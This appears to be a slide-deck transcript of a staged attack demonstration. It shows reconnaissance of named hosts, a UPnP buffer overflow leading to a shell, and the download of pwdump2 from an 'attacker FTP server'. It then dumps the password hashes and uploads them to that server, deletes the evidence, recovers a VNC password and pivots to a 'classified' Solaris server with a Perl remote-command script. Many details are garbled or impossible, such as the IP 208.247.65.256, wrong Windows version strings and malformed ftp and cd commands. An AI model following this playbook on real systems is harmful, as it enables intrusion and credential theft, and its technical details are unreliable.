UPnP Buffer Overflow Demo: This is a True Story… of what could happen
Page 1
UPnP Buffer Overflow Demo
Page 2
This is a True Story… of what could happen
Page 3
Identify Target
Page 4
rri-usa.org IP: 208.247.65.240
Page 5

| Host | Type | Contacts | IP address | Yes/No |
|---|---|---|---|---|
| goliath.rri-usa.org | target systems | Coffey, Brian; Ward, Joanne | 208.247.65.240 | yes |
| david.rri-usa.org | target systems | Coffey, Brian; Ward, Joanne | 216.92.195.219 | yes |
| armaggedon.rri-usa.org | target systems | Coffey, Brian; Ward, Joanne | 208.247.65.192 | yes |
| moneymaker.rri-usa.org | target systems | Coffey, Brian; Ward, Joanne | 208.247.65.224 | yes |
| DNS | 198.6.1.65 | DNS 198.6.1.182 | | Yes |
| beast.rri-usa.org | target systems | Fish, Bob; Duck, Wayne | 208.247.65.256 | yes |
| master.rri-usa.org | target systems | Coffey, Brian; Ward, Joanne | 208.247.65.248 | no |
| gladiator.rri-usa.org | target systems | Riandi Grant; Charles Robert | 208.247.65.248 | no |
| watcher.rri-usa.org | target systems | Coffey, Brian; Ward, Joanne | 208.247.65.248 | no |
| cover.rri-usa.org | target systems | Coffey, Brian; Ward, Joanne | 208.247.65.248 | no |
| johnson.rri-usa.org | target systems | Charles Robert; Horace Oliver | 208.247.65.248 | no |
| nighthawk.rri-usa.org | target systems | Coffey, Brian; Ward, Joanne | 208.247.65.248 | no |
| harper.rri-usa.org | target systems | Riandi Grant; Charles Robert | 208.247.65.248 | no |
| insider.rri-usa.org | target systems | Coffey, Brian; Ward, Joanne | 208.247.65.248 | no |
| jumper.rri-usa.org | | Riandi Grant; Charles Robert; Horace Oliver | 216.92.195.65 | no |
Page 6
Scope Target Topology
Page 7
Microsoft Windows 2000 [Version 4.3.2800]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>tracert -d 216.92.195.219

Tracing route to 216.92.195.219 over a maximum of 30 hops

  1     7 ms     6 ms     7 ms  10.105.0.1
  2    11 ms     7 ms     7 ms  24.95.225.193
  3     7 ms     7 ms     8 ms  24.95.225.13
  4    13 ms    11 ms    12 ms  24.95.224.49
  5    17 ms    17 ms    18 ms  66.185.136.173
  6    16 ms    17 ms    18 ms  66.185.136.164
  7    36 ms    35 ms    36 ms  66.185.152.245
  8    52 ms    52 ms    51 ms  66.185.152.200
  9    52 ms    52 ms    64 ms  66.185.151.67
 10    53 ms    59 ms    52 ms  213.248.82.217
 11   170 ms   175 ms   170 ms  213.248.103.254
 12   170 ms   173 ms   182 ms  172.24.3.22
 13   184 ms   184 ms   185 ms  62.84.135.98
 14   183 ms   180 ms   180 ms  216.92.195.219

Trace complete.

C:\>
Page 8
Map Open Services
Page 9
Microsoft Windows 2000 [Version 4.3.2800]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>nmap -O -sS rri-usa.org/24

Starting nmap V. 2.2-BETA4 by Fyodor ([email protected], www.insecure.org/nmap/)
Host (216.92.195.219) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Interesting ports on rri-usa.org (216.92.195.219):
Port    State   Protocol  Service
22      open    tcp       ssh
111     open    tcp       sunrpc
135     open    tcp       loc-srv
139     open    tcp       netbios-ssn
445     open    tcp       microsoft-ds
515     open    tcp       printer
540     open    tcp       uucp
587     open    tcp       submission
901     open    tcp       samba-swat
1521    open    tcp       ncube-lm
1522    open    tcp       rna-lm
1528    open    tcp       mciautoreg
5000    open    tcp       fics
6000    open    tcp       X11
6112    open    tcp       dtspc
7100    open    tcp       font-service

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=3916950 (Worthy Challenge!)
Remote operating system guess: Microsoft Windows XP [Version 5.1.2600]

Nmap run completed – 256 IP addresses (2 hosts up) scanned in 13 seconds

C:\>
Page 10
Compromise Host
UPnP Buffer Overflow
Page 11
Microsoft Windows 2000 [Version 4.3.2800]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>cd ..\XPloit 216.92.195.219 -e
C:\>cd .\nc 216.92.195.219 7788

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user>
Page 12
Upload pwdump2
Page 13
C:\Documents and Settings\user>ftp
ftp> open
To 67.8.205.154
Connected to 67.8.205.154
220 attacker FTP server (Windows 2000) ready.
User (67.8.205.154:(none)): tgillette
331 Password required for tgillette.
Password: ********
230 User tgillette logged in.
ftp> cd exploits
200 PORT command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (67.8.205.154,3584) (0 bytes).
pwdump2.exe
samdump.dll
226 ASCII Transfer complete.
ftp: 10 bytes received in 0.00Seconds 10000.00Kbytes/sec.
Page 14
ftp> get pwdump2.exe samdump.dll ..\system32\config
200 PORT command successful.
150 ASCII data connection for pwdump2.exe (67.8.205.154,3585) (17 kbytes).
150 ASCII data connection for samdump.dll (67.8.205.154,3585) (14 kbytes).
226 ASCII Transfer complete.
ftp: 31 kbytes received in 0.86Seconds 4000.00Kbytes/sec.
ftp> bye
221 Goodbye

C:\Documents and Settings\user>
Page 15
Get the Password File
Page 16
C:\Documents and Settings\user>cd C:\
C:\>C:\pwdump2 > password.txt
C:\>ftp
ftp> open
To 67.8.205.154
Connected to 67.8.205.154
220 attacker FTP server (Windows 2000) ready.
User (67.8.205.154:(none)): tgillette
331 Password required for tgillette.
Password: ********
230 User tgillette logged in.
ftp> put
Local file ..\password.txt
Remote file ...\passwords
200 PORT command successful.
150 ASCII data connection for …\passwords (67.8.205.154,3614).
226 Transfer complete.
ftp: 80 Kbytes sent in 0.02Seconds 4000.00Kbytes/sec.
ftp> bye
221 Goodbye

C:\>cd C:\WINDOWS\system32\config
C:\WINDOWS\system32\config>del pwdump2.exe samdump.dll passwd.txt
C:\>exit
Page 17
Decrypt Password File
Page 18
Administrator = J0hNnyUtaH
Page 19
Compromise Perimeter Host
Page 20
perl ~roelof/tools/fw1/sr.pl 196.33.86.8
196.33.88.57 S [ms01-023] {.printer} www.microsoft.com/Downloads/Release.asp?ReleaseID=29321

PING 63.77.125.1 (62.77.125.1): 56 data bytes
36 bytes from rri-usa.org (156.131.72.1943: Time to live exceeded

H:\>net view \\62.77.121.36
Shared resources at \\62.77.121.36

H:\>net use t: \\62.77.121.36\d_drive /USER:tadmin *
Type the password for \\63.76.122.41\d_drive: [tadmin]
The command completed successfully.

C:\>
Page 21
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\ca]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\ca\Certificates]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\EFS]
"EFSBlob"=hex:01,00,01,00,01,00,00,00,78,02,00,00,74,02,00,00,1c,00,00,00,02,\
  38,30,82,01,a5,a0,03,02,01,02,02,0f,93,ee,46,14,ad,93,8c,4e,1f,6f,b0,a2,84,\
  e8,31,30,09,06,05,2b,0e,03,02,1d,05,00,30,50,31,16,30,14,06,0345,46,53,31,28,30,26,06,03,55,04,0b,13,1f,45,46,53,20,46,69,6c,65

extract encrypted password
"Password"=hex:61,f5,ec,5e,80,f5,c9,92

C:\>
Page 22
End Game: Compromise Classified Server
Page 23
C:\>x4 -W61f5ec5e80f5c992
Entered HEX String: 61 f5 ec 5e 80 f5 c9 92
Access Password: s3cr3t

decrypt classified UNIX access password

C:\>
Page 24
# ------------ we can assume that the cmd.exe is copied from y $path;
($dummy,$path)=split(/:/,$thedir);
$path =~ s/\\/\//g;
$runi="/".$unidir."/sensepost.exe?/c";
$thecommand=~s/ /%20/g;
@results=sendraw("GET $runi+$thecommand HTTP/1.0\r\n\r\n");
foreach $line (@results){
    if ($line =~ /denied/) {die "sorry, access denied\n";}
}
print @results;

sub sendraw {
    my ($pstr)=@_;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        my @in="";
        select(S); $|=1; print $pstr;
        while(<S>) { push @in,$_; last if ($line=~ /^[\r\n]+$/ );}
        select(STDOUT);
        return @in;
    } else { die("connect problems\n"); }
}

exploit internal host

$
Page 25
#> rlogin -l root tgtsunprod2
Last login: Tue Jul 3 14:52:41 from tgtsunprod1
Sun Microsystems Inc. SunOS 5.8 Generic February 2000
***** Warning Government Classified Server ***
You have mail.
tgtsunprod2 # /usr/sbin/ifconfig -a
lo0: flags=1000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4> mtu 8232 index 1
        inet 127.0.0.1 netmask ff000000
qfe0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2
        inet 172.16.22.7 netmask ffffff00 broadcast 172.16.21.255
        ether 8:0:20:f7:d0:78
tgtsunprod2 # uname -a
SunOS tgtsunprod2 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-80
tgtsunprod2 # id
uid=0(root) gid=1(other)

final target compromised

$
Page 26
All your base are belong to us...
Page 27
…all your base? Bad english..
or something more sinister?